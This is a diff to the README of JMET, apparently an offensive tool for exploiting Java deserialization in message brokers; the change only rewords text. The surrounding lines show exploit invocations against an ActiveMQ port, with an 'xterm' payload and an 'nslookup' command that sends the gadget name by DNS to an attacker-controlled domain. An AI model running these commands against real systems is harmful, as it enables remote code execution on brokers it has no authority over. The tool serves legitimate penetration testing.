matthiaskaiser/jmet/README.md

 $ java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -Y xterm jmstarget 61616
 ```
 To find out which gadget was executed you can use the "substitution"-mode with
- an Out-Of-Band channel like DNS.
-To pass the gadget name to your command to be
+ an out-of-band channel like DNS.
+To pass the gadget name to your command use
-  executed use the "§§" string which then gets substituted with the gadget name.
+ the "§§" string which then gets substituted with the gadget name.

 ```bash
 $ java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "nslookup §§.yourdomain.com" jmstarget 61616